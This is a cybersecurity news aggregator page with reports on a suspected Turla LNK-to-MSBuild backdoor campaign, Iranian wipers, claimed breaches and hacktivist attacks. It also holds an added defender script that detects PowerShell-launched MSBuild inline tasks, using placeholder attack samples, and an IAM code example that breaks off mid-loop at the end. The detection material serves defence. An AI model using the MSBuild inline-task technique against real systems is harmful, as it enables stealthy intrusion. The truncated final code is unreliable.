Cyber security aggregate RSS news

Cyber security aggregator - feeds history

Turla APT Group Susp ...

Firewall Daily

Cyble Research and Intelligence Labs (CRIL) has discovered a sophisticated cyber campaign employing malicious LNK files, potentially distributed through spam emails. This intricate operation, possibly orchestrated by the notorious Turla Advanced Persistent Threat (APT) group, employs human rights seminar invitations and public advisories as bait to infiltrate users' systems with a nefarious payload. The threat actors (TAs) showcase a high level of sophistication by embedding lure PDFs and MSBuild project files within the .LNK files, ensuring a seamless execution process. Leveraging the Microsoft Build Engine (MSBuild), the TA executes these project files to deploy a stealthy, fileless final payload, acting as a backdoor to facilitate remote control over the compromised system.

Turla APT Group Infection Chain

(Image source: Cyble)

The attack unfolds with a malicious .LNK file concealed within a ZIP archive, potentially delivered via phishing emails. Upon execution, the .LNK file triggers a PowerShell script, initiating a sequence of operations. These operations include extracting content from the .LNK file and creating three distinct files in the %temp% location: a lure PDF, encrypted data, and a custom MSBuild project.

(Image source: Cyble)

The disguised .LNK file triggers a PowerShell script, which then opens the lure PDF while silently executing the embedded MSBuild project.

(Image source: Cyble)

This project file, containing encrypted content, employs the Rijndael algorithm to decrypt data, subsequently executing a final backdoor payload.

(Image source: Cyble)

The decrypted MSBuild project file, when executed using MSBuild.exe, runs an inline task directly in memory. This task enables the backdoor to initiate various operations, including monitoring processes, executing commands, and communicating with a Command and Control (C&C) server for further instructions.

Threat Actor Attribution to Turla APT Group

According to CRIL, the threat actor behind this campaign is the Turla APT group, based on Russian-language comments in the code and behavioral similarities with previous Turla campaigns. The group's focus on targeting NGOs aligns with the lure documents referencing human rights seminars. The use of MSBuild and other legitimate applications highlights the persistent nature of the threat actor: by abusing built-in functionality, the Turla APT group can evade conventional security measures. Organizations must adopt a multi-layered security approach to mitigate risks effectively.

To fortify defenses against sophisticated threats like the Turla APT group, organizations should adopt key cybersecurity measures. This includes implementing robust email filtering to block malicious attachments and exercising caution when handling email attachments from unknown sources. Limiting access to development tools such as MSBuild to authorized personnel helps prevent misuse, while disabling unnecessary scripting languages like PowerShell reduces the risk of exploitation. Establishing network-level monitoring is crucial for detecting and responding to anomalous activities swiftly. These practices collectively enhance security posture, safeguarding sensitive data and systems from cyber threats.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
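The chain described above (explorer launching PowerShell from the .LNK, PowerShell launching MSBuild.exe on a project dropped in %temp%, the project carrying an inline task that MSBuild compiles and runs in memory) gives a defender two concrete things to look for. The following is an added example, not code from Cyble or from the report: it runs two checks over constructed sample data (process events and a minimal project file, all paths and PIDs invented). The inline-task detection relies on the MSBuild `UsingTask` element with a `CodeTaskFactory`/`RoslynCodeTaskFactory` attribute, which is how inline tasks are declared.

```python
"""Defender-side checks for the LNK -> PowerShell -> MSBuild inline-task chain.

Added example; all events, paths, PIDs and the sample project are constructed.
  1. process_chain_findings(): flags MSBuild.exe that has PowerShell in its
     ancestry and/or builds a project from a per-user temp directory.
  2. project_has_inline_task(): flags an MSBuild project that declares an
     inline task (UsingTask with a code TaskFactory), which MSBuild compiles
     and executes in memory without writing a DLL to disk.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable, as logged
    cmdline: str    # command line, as logged


# Matches per-user and system temp directories in a command line.
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
INLINE_TASK_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(event, by_pid):
    """Yield parent, grandparent, ... until the chain ends (cycle-safe)."""
    seen = set()
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def process_chain_findings(events):
    """Return one finding per suspicious MSBuild.exe process."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if _basename(e.image) != "msbuild.exe":
            continue
        chain = [_basename(a.image) for a in _ancestors(e, by_pid)]
        reasons = []
        if "powershell.exe" in chain or "pwsh.exe" in chain:
            reasons.append("msbuild_from_powershell")
        if TEMP_DIR_RE.search(e.cmdline):
            reasons.append("msbuild_project_in_temp")
        if reasons:
            findings.append({"pid": e.pid, "reasons": reasons, "chain": chain})
    return findings


def project_has_inline_task(project_xml: str) -> bool:
    """True if the project declares a UsingTask with an inline-code TaskFactory."""
    root = ET.fromstring(project_xml)
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # strip the MSBuild XML namespace, if present
        if tag == "UsingTask":
            if el.attrib.get("TaskFactory", "").lower() in INLINE_TASK_FACTORIES:
                return True
    return False


# Constructed process tree: explorer (LNK double-click) -> powershell -> MSBuild,
# plus a benign developer build launched from Visual Studio for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "<extraction script>"'),
    ProcEvent(300, 200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\invite.proj"),
    ProcEvent(400, 1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(500, 400, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
]

# Constructed minimal project with an inline task (not the campaign's actual file).
INLINE_TASK_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run"><Payload /></Target>
  <UsingTask TaskName="Payload" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs">/* compiled and run in memory */</Code></Task>
  </UsingTask>
</Project>"""

PLAIN_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Message Text="hello" /></Target>
</Project>"""

if __name__ == "__main__":
    for f in process_chain_findings(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {', '.join(f['reasons'])} (chain: {' <- '.join(f['chain'])})")
    print("inline task in sample project:", project_has_inline_task(INLINE_TASK_PROJECT))
    print("inline task in plain project:", project_has_inline_task(PLAIN_PROJECT))
```

The developer build (pid 500) produces no finding because its ancestry is devenv.exe and its project lives outside a temp directory; in real telemetry, pair the process check with the project-file check so that a build from an unusual location is escalated only when the project actually declares an inline task.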

Void Manticore: Iran ...

Cyber Warfare

An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) is using destructive data wiping attacks combined with influence operations to target Israel and Albania. Tracked as Void Manticore, aka Storm-842, the threat actor operates under multiple online personas, the primary aliases being "Homeland Justice" for attacks in Albania and "Karma" for those in Israel.

Since October 2023, Check Point Research has monitored Void Manticore's activities targeting Israeli organizations with destructive attacks using wipers and ransomware. The group employs five different methods for disruptive operations, including custom wipers for both Windows and Linux operating systems, as well as manual deletion of files and shared drives.

Void Manticore's activities in Israel are marked by the use of a custom wiper named "BiBi," after Israeli Prime Minister Benjamin Netanyahu. The group also uses a persona named "Karma" to leak stolen information, portraying themselves as an anti-Zionist Jewish group. This persona gained prominence during the Israel-Hamas conflict in late 2023.

The Void Manticore threat actor employs relatively simple and direct techniques, often using basic publicly available tools. Their operations typically involve lateral movement using Remote Desktop Protocol (RDP) and the manual deployment of wipers. One of their prominent tools is "Karma Shell," a homebrewed web shell disguised as an error page. This malicious shell is capable of directory listing, process creation, file uploads, and service management.

The Destructive Wiper Capabilities of Void Manticore

Void Manticore utilizes various custom wipers in their attacks:

Cl Wiper: First used in attacks against Albania, this wiper uses the ElRawDisk driver to interact with files and partitions, effectively erasing data by overwriting physical drives with predefined buffers.

Partition Wipers: These wipers remove partition information, corrupting the partition table and thereby destroying all data on the disk; the system crashes on the next reboot.

BiBi Wiper: Deployed in recent attacks against Israel, this wiper exists in both Linux and Windows variants. It corrupts files and renames them with specific extensions, causing significant data loss.

Apart from automated wipers, Void Manticore engages in manual data destruction using tools like Windows Explorer, Sysinternals SDelete and the Windows Format utility, furthering their impact on targeted systems.

Psychological Warfare and Collaboration with Scarred Manticore

Void Manticore's strategy also includes psychological operations, aiming to demoralize and disrupt their targets by publicly leaking sensitive information. This dual approach amplifies the impact of their cyberattacks, making them a formidable threat.

Notably, there is a significant overlap and cooperation between Void Manticore and another Iranian threat group, Scarred Manticore (aka Storm-861). Analysis shows a systematic handoff of victims between these two groups. For instance, Scarred Manticore might establish initial access and exfiltrate data, after which Void Manticore executes the destructive data wiping attack. This collaboration enables the Void Manticore threat actor to leverage Scarred Manticore's advanced capabilities and gain access to high-value targets.

"In the case of one victim, we discovered that after residing on the targeted network for over a year, Scarred Manticore was interacting with the infected machine at the exact moment a new web shell was dropped to disk. Following the shell's deployment, a different set of IPs began accessing the network, suggesting the involvement of another actor – Void Manticore," the researchers said. "The newly deployed web shell and subsequent tools were significantly less sophisticated than those in Scarred Manticore's arsenal. However, they led to the deployment of the BiBi wiper, which is linked to Karma's activity."

Void Manticore represents a significant cyber threat, particularly in the context of geopolitical tensions involving Iran. Iranian President Ebrahim Raisi died in a helicopter crash in a remote area of the country. Rescuers identified Raisi's body early Monday after searching in the mountainous northwest near the Azerbaijan border. Since his election in 2021, Raisi had tightened morality laws, cracked down on antigovernment protests and resisted international oversight of Tehran's nuclear program. Israel's war in Gaza has escalated conflicts with Iran-backed groups like Hezbollah in Lebanon and the Houthis in Yemen. Last month, Iran and Israel exchanged direct strikes. It is still unclear whether Raisi's death is also linked to Israeli operations.

Against the backdrop of these escalations, Void Manticore's coordinated operations with Scarred Manticore combine technical destruction with psychological manipulation and position the group as a highly dangerous actor. Their activities not only target infrastructure but also aim to influence public perception and political stability, underlining the multifaceted nature of modern cyber warfare.

Threat Actors USDoD ...

Cybersecurity News

Threat actors USDoD and SXUL have claimed responsibility on LeakBase for an alleged major prison data breach, compromising approximately 70 million rows of sensitive data linked to a criminal database. While no further details were shared about the specific prison(s) involved, the threat actor shared sample data allegedly stemming from the claimed prison data breach.

Prison Data Breach Allegedly Includes Wide Array of Data

The prison data leak reportedly includes unique identification numbers, Social Security Numbers, full names, dates of birth, birth states, physical features, home and alternate addresses, offense codes, offense dates, offense descriptions, court dispositions, conviction dates and dates of charges. The data had been shared in .csv format and is stated to be 3GB in size when compressed and 22GB uncompressed. The data is stated to span the years 2020 to 2024, and sample data purporting to be the details of at least three convicted individuals was shared.

(Image source: X.com (@DarkWebInformer))

While this marks the first time the threat actor USDoD has posted on LeakBase, the threat actor claimed they would use it only until they got their own forum active. USDoD had earlier announced the creation of a new leak forum, choosing to name it 'Breach Nation'. While the details of the attack and their alleged involvement are unknown, USDoD credited the threat actor SXUL for the prison data breach. In a later reply to the thread, he clarified that the breach stemmed from the United States.

USDoD Known to Target Government Related Data

The threat actor has frequently targeted government, defense/law-enforcement contractors and geo-political entities, with most of his operations primarily focused on the United States, as noticed during the #RaidAgainstTheUS campaign. The incidents under the two-day release campaign in February 2022 included a US Strategic Command database, a US Defense Technical Information Center database, an Army Special Operations Center of Excellence database, a US Central Command database, a U.S. Special Operations Command database, and a Lockheed Martin database.

While believed to harbor pro-Russian ties or sympathies, he has denied any involvement with governments or political entities. This denial included a statement in which he claimed to have refused an offer to sell compromised intel to the Iranian government after being approached by them. Interestingly, the threat actor maintained Russia as among the nations he would refuse to target, along with Iran.

USDoD is known to rely on social engineering techniques to break into high-profile agencies or entities, and his previous attacks have included the FBI's private partner InfraGard, the leak of Airbus data on the 22nd anniversary of the 9/11 attacks, the NATO Cyber Center Defense, and CEPOL. USDoD has disclosed the use of tools such as ZoomInfo to identify and research targets as well as their importance within the military and defense sector. Within the Airbus post, the threat actor also threatened attacks on Lockheed Martin, Raytheon and other defense contractors.

Recently, the actor claimed attacks on entities such as the Chinese Communist Party (an unconfirmed data leak) and Bureau van Dijk (which has since been refuted); since then the threat actor appears to be working on setting up their own content delivery network to host leak files as well as their own data leak forum. While the prison data breach remains unconfirmed, the threat actor's previous involvement in high-profile social engineering attacks remains a cause for concern regarding future operations and claims, along with the potential consequences stemming from the alleged prison member data leak.

University of Siena ...

Cybersecurity News

The University of Siena, a distinguished Italian academic institution established in 1240, is currently grappling with a significant cybersecurity incident. The LockBit 3.0 ransomware group has claimed responsibility for the attack that has disrupted multiple university services, leading to the temporary suspension of its systems. As one of Europe's oldest universities, Siena offers extensive programs in sciences, medicine, engineering, economics, and social sciences. In response to the crisis, the university has initiated recovery operations with the support of the Italian National Cybersecurity Agency (Agenzia per la Cybersicurezza Nazionale), although the involvement of LockBit has not yet been officially confirmed.

University of Siena Data Breach and Ransom Demand

According to the new LockBit 3.0 leak site, the group has allegedly exfiltrated 514 GB of sensitive data from the university's systems. Screenshots of the stolen data were shared on both the leak site and the group's Telegram channel. The stolen data reportedly includes:

Financial documents, including: budgets detailing expenses by month from 2020 to 2024; board-approved documents regarding project and tender financing from 2022 to 2026, including funding amounts; and documents related to extraordinary construction works, contractor appointments, and a €1.7 million budget allocation.

Confidential information, including: non-disclosure agreements for the upcoming WineCraft 2024 event; tender design contracts for 2023, including contract budgets; and the contractor's investment plan for 2022, encompassing expenses, rents, and the overall financial plan.

(Image source: LockBit leak site)

(Image source: LockBit Telegram)

With a looming ransom deadline set for May 28, the university is racing against limited time to deal with the consequences of the digital assault. Earlier, on May 10th, the University of Siena acknowledged the cyber attack on its website, informing the public about the suspension of several of its services due to a 'massive cyber attack by an international group of hackers.'

University's Response and Restoration Efforts

The website acknowledged that several of its services, including its website for international admissions, ticketing services, and payment management platforms, had been affected and were taken down as a preventative measure. The notice assured users that payments made prior to the attack had been registered despite a temporary disconnect between the website's payment confirmation and application processing.

(Image source: www.apply.unisi.it)

However, the notice also stated that the volume of assistance requests being received from international candidates following the incident was overwhelming its staff. The notice advised students to refrain from sending multiple inquiries, promising to respond as soon as possible. The notice provided separate advice to candidates who had already paid university fees but had not submitted applications and to candidates who had submitted admission applications but had not yet paid their application fees. The site stated in bold that students who fall into the above-mentioned categories should avoid unnecessary contact with staff, while apologizing for the inconvenience caused by the issue.

The attack on the University of Siena is one of the largest attacks claimed by the LockBit group following the recent disruption to its activities after its coordinated takedown by law enforcement agencies. The incident underscores the group's persistent efforts to remain active despite these operational challenges, while emphasizing its ability to still cause massive disruption to victims.

Kyrgyzstan Unrest Es ...

Firewall Daily

Bishkek, the capital of Kyrgyzstan, is currently reeling under severe mob violence and escalating cyberattacks on Kyrgyzstan, marking a turbulent period for the nation. The recent upheaval, primarily targeting foreign students, has drawn significant international attention and diplomatic concerns, particularly from India and Pakistan.

The Catalyst for Chaos

The unrest began on the night of May 17-18, following a viral video allegedly depicting a fight between Kyrgyz and Egyptian medical students on May 13. The video, which rapidly spread across social media, purportedly showed Kyrgyz students in conflict with Egyptian students. This incident triggered widespread mob violence, with locals directing their aggression towards foreign students, exacerbating tensions in Bishkek. Despite the lack of verified evidence that the individuals involved were Kyrgyz youths, the video sparked significant social unrest. The ensuing chaos resulted in 28 injuries, including three foreigners, prompting riot police to intervene and cordon off areas where mobs had gathered. Footage circulating online showed mobs attacking foreign students in the streets and even within dormitories, creating an environment of fear and hostility for international students.

Cyberattacks on Kyrgyzstan Compound the Crisis

Amidst the physical violence, Kyrgyzstan's digital infrastructure is under severe attack from various hacktivist groups. These coordinated cyberattacks on Kyrgyzstan have targeted critical governmental and private sector systems, exacerbating the already volatile situation. Several hacktivist groups are involved in these cyber assaults:

Team Insane PK has allegedly attacked the Ministry of Agriculture, the Education Portal of the Ministry of Emergency Situations, Saima Telecom, the Climate Monitoring Platform (http://climatehub.kg), and multiple universities including Osh State University and Kyrgyz State Medical Academy.

Silent Cyber Force, another Pakistan-based group, has also allegedly targeted Kyrgyzstan's Ministry of Defence and Ministry of Agriculture.

(Image source: X)

(Image source: X)

Golden Don's has allegedly launched cyberattacks on the Ministry of Economy and Commerce, the Kyrgyzstan Visa Website, and Kyrgyzstan Turkish Manas University.

Anon Sec BD from Bangladesh has allegedly attacked MBank and Finca Bank.

An individual hacktivist known as 'rajib' allegedly targeted the official portal of Kyrgyzstan's railway.

Sylhet Gang has allegedly disrupted the Kyrgyz Ministry of Foreign Affairs and the Kyrgyz telecommunication network Nur, causing significant outages.

Furthermore, there are claims that the Mysterious Team Bangladesh is planning future cyberattacks on Kyrgyzstan.

(Image source: X)

One of the hacktivist groups, Silent Cyber Force, posted a message titled "Greetings Citizens Of The World," condemning the violence against foreign students and declaring their intention to take down Kyrgyzstan's governmental websites and large networks. Their message explicitly mentioned targeting various international adversaries but stated that the current focus is on Kyrgyzstan due to the perceived inaction of its government in protecting foreign students.

(Image source: X)

Despite these threats, the official websites of the targeted institutions appeared to be functioning normally when accessed. This raises questions about the hackers' actual capabilities or possible tactical delays in executing their threats. The full extent and impact of these cyberattacks on Kyrgyzstan will become clearer once official statements are released.

The Implications and the Need for Vigilance

The combination of physical violence and digital attacks underlines the critical need for enhanced security measures in both physical and cyber domains. These cyber threats not only disrupt governmental operations but also pose significant risks to essential services that affect both citizens and foreign nationals in Kyrgyzstan.

The current situation in Kyrgyzstan highlights the vulnerability of digital infrastructure during periods of social unrest. Hacktivist groups are leveraging the chaos to further their agendas, targeting key institutions and spreading fear and disruption. The ongoing cyberattacks on Kyrgyzstan demonstrate the importance of cyber threat intelligence and the need for comprehensive cybersecurity strategies to protect national infrastructure. In response to these developments, it is imperative for Kyrgyzstan to strengthen its cybersecurity defenses and enhance its physical security measures to safeguard all residents, including foreign students.

Threat Actor Chucky, ...

Firewall Daily

The threat actor and owner of the English-language cybercrime forum LeakBase, Chucky, has leaked a database allegedly stolen from the Spanish IT services company Knowmad Mood. The Knowmad Mood data breach reportedly contains sensitive employee data. Knowmad Mood, which recently changed its name and branding from the earlier name atSistemas, was established in 1994 and provides consulting and software development services, with offices in Spain, Italy, Portugal, the United States, Morocco, the United Kingdom, and Uruguay. LeakBase is a data leak forum that gained popularity as an alternative source for sharing hacked data or leaked databases and credentials following the 2023 BreachForums takedown.

Knowmad Mood Data Breach Stems from CRM System

The stolen data was allegedly exported from the company's CRM system, and Chucky shared screenshots to further cement his responsibility for the Knowmad Mood data breach. The screenshots appeared to reveal a cache of sensitive files, including HTML, Excel, and Word documents.

(Image source: LeakBase Forum)

Further, a CSV file had been shared and was stated to contain workplace information and performance metrics of employees, including fields such as names, email addresses, h.input, h.exit, effective h., STE, STE Percentage, and h.STE. The leaked data raises serious concerns about the security measures in place at Knowmad Mood and the potential impact it may have on employees and customers. The Cyber Express team has reached out to Knowmad Mood for further information or updates on the alleged data breach claims; however, no updates had been received at the time of writing.

Earlier Activities of Threat Actor Chucky

The threat actor Chucky, admin of LeakBase, has previously operated under the names LeakBase, Sqlrip, and Chuckies on various underground forums. After the mid-March 2023 shutdown of BreachForums, the threat actor's own forum, LeakBase, started gaining traction among the cybercriminal community. Chucky had been a regular participant and contributor on BreachForums, sharing breached databases and selling admin/unauthorized access to websites, while also being the top active poster on their own LeakBase leak forum.

The threat actor had disclosed to Cyble researchers that their primary tactic involved a customized brute forcing technique. While the researchers confirmed that the technique might serve as a plausible method for the threat actor's data breach attacks, the full tactics, techniques, and procedures (TTPs) employed by the TA remained unconfirmed. Chucky previously claimed responsibility for massive leaks from sources such as the Indian government's Swachh City initiative, OnePlus-Oppo & Realme in a data breach attack affecting users from Thailand, Gamekaking, and the American automotive digital marketing service Purecars.

Unverified Claims of ...

Firewall Daily

The Just Evil/Killmilk hacker group has claimed the Hamburg Airport cyberattack, asserting access to certain parts of the airport's premises. The claim, posted in cryptic messages on social media platforms, suggests a breach of security protocols with detailed descriptions of airport locations and systems. The post, which includes snippets of code and references to specific areas within the airport, has raised concerns about the vulnerability of critical infrastructure to cyber threats. However, as of now, there has been no official confirmation or response from Hamburg Airport authorities regarding the alleged cyberattack.

Unverified Hamburg Airport Cyberattack Claims

(Image source: X)

The Cyber Express reached out to the airport authorities for clarification on the alleged cyberattack on Hamburg Airport. However, at the time of writing, no official statement or response has been received. This lack of response leaves the claims of a cyberattack on Hamburg Airport unverified at present. While the airport's website appears to be functioning normally, with no visible signs of disruption, the possibility of a targeted cyberattack on backend systems cannot be ruled out. If an attack did occur, it may have been limited in scope or duration, as similar attacks in the past have been.

Adding to the intrigue surrounding these claims is the background of the individual behind Just Evil/Killmilk. Identified as Nikolai Serafimov, a 30-year-old Russian citizen, he is purportedly the leader of the infamous hacktivist group Killnet. Serafimov's past involvement in criminal activities, including narcotics-related offenses and a stint in a Russian prison, adds a layer of complexity to the situation.

Who is the Killnet Hacker Group?

On August 1, 2022, "Killmilk" and its founder launched a cyber-attack on Lockheed Martin, citing retaliation for the U.S. supplying HIMARS systems to Ukraine. Accusing Lockheed Martin of sponsoring terrorism, the group targeted production systems and employee information. This marked a shift from their previous tactics of Distributed Denial-of-Service (DDoS) attacks.

Led by Serafimov, Killmilk had been involved in various cyber activities, including operating "Black Listing," a DDoS-for-pay platform. Serafimov introduced "Black Skills," a Private Military Hacking Company, indicating the increasing threat of cyber warfare by non-state actors. The emergence of new tactics and entities like "Black Skills" highlights this threat actor and its firm plans for creating cyber conflict.

This is an ongoing story and The Cyber Express will be closely monitoring the situation. We'll update this story once we have more information on the alleged Hamburg Airport cyberattack or any official confirmation from the authorities.

Amateur Radio Group ...

Firewall Daily

The amateur radio community, the American Radio Relay League (ARRL), the preeminent national association for amateur radio enthusiasts in the United States, has confirmed that it has been the target of a significant cyberattack. In an official statement, ARRL detailed the scope of cyberattack on ARRL. "We are in   show more ...

the process of responding to a serious incident involving access to our network and headquarters-based systems." This cyberattack on ARRL has affected multiple network systems and several of ARRL's vital online services. Cyberattack on ARRL: What is Affected? Foremost among the compromised services is the "Logbook of The World" (LoTW) internet database. This platform is crucial for amateur radio operators, allowing them to record and verify successful contacts (QSOs) with fellow operators globally. The LoTW's functionality as a digital logbook and a user confirmation system is central to the operations of many enthusiasts who rely on its integrity for maintaining accurate records. "Several services, such as Logbook of The World® and the ARRL Learning Center, are affected. Please know that restoring access is our highest priority, and we are expeditiously working with outside industry experts to address the issue. We appreciate your patience," the official statement read. The ARRL's importance to the amateur radio community cannot be overstated. As the national amateur radio organization, it provides crucial technical assistance, advocates for regulatory considerations, and organizes educational and networking opportunities for its members. The ARRL cyberattack thus has a broad impact, affecting not just the organization but the wider community of amateur radio operators who depend on ARRL’s services for their activities and growth. Reassurances on Data Security In a follow-up update, ARRL addressed growing concerns from its members about the potential compromise of personal information. Officials reassured members that no social security numbers or credit card information are stored on their systems. "Some members have asked whether their personal information has been compromised in some way. ARRL does not store credit card information anywhere on our systems, and we do not collect social security numbers. 
Our member database only contains publicly available information like name, address, and call sign along with ARRL-specific data like email preferences and membership dates," the update clarified.

Even so, the member database holds personal data: names, postal addresses, call signs and the email addresses required for membership. ARRL characterises most of this as publicly available, but it has not said whether, or to what extent, the data was accessed or exfiltrated during the attack.

ARRL has not confirmed the nature of the incident, whether ransomware or another form of intrusion. The situation remains fluid, with ARRL working with external cybersecurity experts to contain the impact and restore full functionality to its services. Reaction in the amateur radio community has been mixed: many have expressed support and patience, while others have voiced concerns over data security and the potential long-term effects on ARRL's operations.

The incident is also a reminder of the exposure that comes with moving critical services online. As organizations increasingly rely on online platforms for critical services, stronger cybersecurity measures become indispensable, and ARRL's experience may prompt other associations and similar bodies to re-evaluate their security posture and adopt stricter safeguards.

For now, the amateur radio community remains cautiously optimistic. The expertise and dedication of ARRL's team, combined with outside support, give hope that the affected services will be restored soon. The Cyber Express Team has reached out to ARRL for further comment and updates; as of now, no response has been received.
As the story develops, the amateur radio community and cybersecurity experts alike await more detailed information on the nature and extent of the breach, and the steps being taken to safeguard against future incidents.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.


 Firewall Daily

In a move to enhance international cooperation on the regulation of Artificial Intelligence (AI), Britain's AI Safety Institute is set to establish a new office in the United States. The decision aims to reinforce collaboration in managing the rapid advancement of AI technology, signalling a proactive step toward addressing global concerns. Scheduled to open this summer in San Francisco, the new office will assemble a team of technical experts, complementing the Institute's existing operations in London. By strengthening ties with its American counterparts, the Institute seeks to facilitate knowledge exchange and harmonize regulatory efforts across borders.

Britain's AI Safety Institute Opens in San Francisco, USA

The urgency of regulating AI has been highlighted by experts who liken its potential threats to existential challenges such as nuclear weapons and climate change. Geoffrey Hinton, a prominent figure in AI development, emphasized the pressing need for action, suggesting that AI may present a more immediate danger than climate change and, unlike climate change, lacks relatively straightforward mitigation strategies. Such remarks underline the importance of coordinated international efforts in shaping AI policies and safeguards. The Institute's presence in the US is intended to bolster that collaboration and solidify its role in AI safety. "The office is expected to open this summer, recruiting the first team of technical staff headed up by a Research Director. It will be a complementary branch of the Institute's London HQ, which continues to grow from strength to strength and already boasts a team of over 30 technical staff", the AI Safety Institute said in a press release. At the same time, the Institute released its first AI safety testing results and announced a partnership with Canada, underlining its commitment to global AI safety. These initiatives mark significant progress since the inaugural AI Safety Summit and reflect the collaborative, multi-organization approach to rigorous evaluation of AI systems.
Global Leaders Respond to the Threat of Artificial Intelligence (AI)

The announcement of the Institute's expansion coincides with the upcoming global AI safety summit, jointly hosted by the British and South Korean governments. This collaborative platform aims to address emerging challenges and chart a course for responsible AI governance on a global scale. The initiative comes in the wake of growing concerns raised by technology leaders and experts regarding the unbridled development of powerful AI systems. Calls for a temporary halt in the advancement of AI technology have been echoed by various stakeholders, emphasizing the need for prudent and transparent regulatory frameworks.

The inaugural AI safety summit, held at Britain's Bletchley Park, served as a forum for constructive dialogue among world leaders, industry executives, and academics. Notable participants, including U.S. Vice President Kamala Harris and representatives from leading AI research institutions, engaged in discussions aimed at shaping ethical guidelines and policy frameworks for AI development and deployment. The collaborative spirit shown at the summit, exemplified by China's endorsement of the "Bletchley Declaration", highlights the importance of collective action in addressing AI-related challenges. By fostering inclusive dialogue and cooperation, stakeholders can navigate the complexities of AI governance while maximizing its societal benefits.

 Security Tips and Advice

The UK government has released guidance to help AI developers and vendors protect their AI models from hacking and potential sabotage, with the goal of transforming this guidance into a global standard to promote security by design in AI systems.

 Expert Blogs and Opinion

Adequate IAM policies are essential for incident management tooling, so that the right people can act on an incident quickly without being blocked. Authentication verifies a person's identity, while authorization decides what that identity is permitted to do: which actions, on which resources, and for how long.
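As an added illustration (not part of the original item and not any particular product's code), the Python below keeps the two concerns the note describes apart: a session lookup that only establishes identity, and a deny-by-default authorization check driven by roles, with a time-boxed break-glass escalation so an on-call responder is not blocked during an incident. The roles, permission strings, user names and session store are assumptions constructed for the example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional

# Role -> set of (action, resource pattern). Anything not listed is denied.
# These roles and permission strings are assumptions made for the example.
ROLE_PERMISSIONS = {
    "viewer": {("read", "incident:*")},
    "responder": {("read", "incident:*"), ("update", "incident:*"), ("page", "oncall:*")},
    "admin": {("read", "*"), ("update", "*"), ("page", "*"), ("delete", "*"), ("grant", "*")},
}


@dataclass
class Principal:
    user: str                          # identity as established by authentication
    roles: set = field(default_factory=set)
    breakglass_until: Optional[datetime] = None


def authenticate(token: str, sessions: dict) -> Optional[Principal]:
    """Authentication only answers 'who is this?'; it grants nothing by itself."""
    return sessions.get(token)


def _matches(pattern: str, resource: str) -> bool:
    if pattern == "*":
        return True
    if pattern.endswith(":*"):
        return resource.startswith(pattern[:-1])
    return pattern == resource


def is_authorized(p: Principal, action: str, resource: str, now: Optional[datetime] = None) -> bool:
    """Authorization: deny by default. Roles grant explicit (action, resource) pairs;
    an unexpired break-glass window adds the responder role temporarily."""
    now = now or datetime.now(timezone.utc)
    roles = set(p.roles)
    if p.breakglass_until is not None and now < p.breakglass_until:
        roles.add("responder")
    return any(act == action and _matches(pat, resource)
               for role in roles for act, pat in ROLE_PERMISSIONS.get(role, ()))


def grant_breakglass(target: Principal, approver: Principal, minutes: int = 60,
                     now: Optional[datetime] = None) -> bool:
    """Time-boxed escalation; only a principal holding 'grant' may approve it,
    and the window expires on its own so the shortcut never becomes permanent."""
    now = now or datetime.now(timezone.utc)
    if not is_authorized(approver, "grant", "breakglass:" + target.user, now):
        return False
    target.breakglass_until = now + timedelta(minutes=minutes)
    return True


EXAMPLE_NOW = datetime(2024, 5, 20, 12, 0, tzinfo=timezone.utc)   # fixed clock for the demo


def run_demo() -> dict:
    """Scripted scenario with constructed users and a constructed session store;
    returns the outcome of each check so it can be inspected or asserted on."""
    admin = Principal("alice", {"admin"})
    bob = Principal("bob", {"viewer"})
    sessions = {"tok-bob": bob}

    def later(minutes: int) -> datetime:
        return EXAMPLE_NOW + timedelta(minutes=minutes)

    return {
        "authn_known": authenticate("tok-bob", sessions) is bob,
        "authn_unknown": authenticate("bogus", sessions) is None,
        "viewer_can_read": is_authorized(bob, "read", "incident:42", EXAMPLE_NOW),
        "viewer_cannot_update": not is_authorized(bob, "update", "incident:42", EXAMPLE_NOW),
        "self_grant_denied": not grant_breakglass(bob, bob, 30, EXAMPLE_NOW),
        "admin_grant_ok": grant_breakglass(bob, admin, 30, EXAMPLE_NOW),
        "escalated_can_update": is_authorized(bob, "update", "incident:42", later(10)),
        "escalation_expires": not is_authorized(bob, "update", "incident:42", later(31)),
        "never_delete": not is_authorized(bob, "delete", "incident:42", later(10)),
    }


if __name__ == "__main__":
    for check, ok in run_demo().items():
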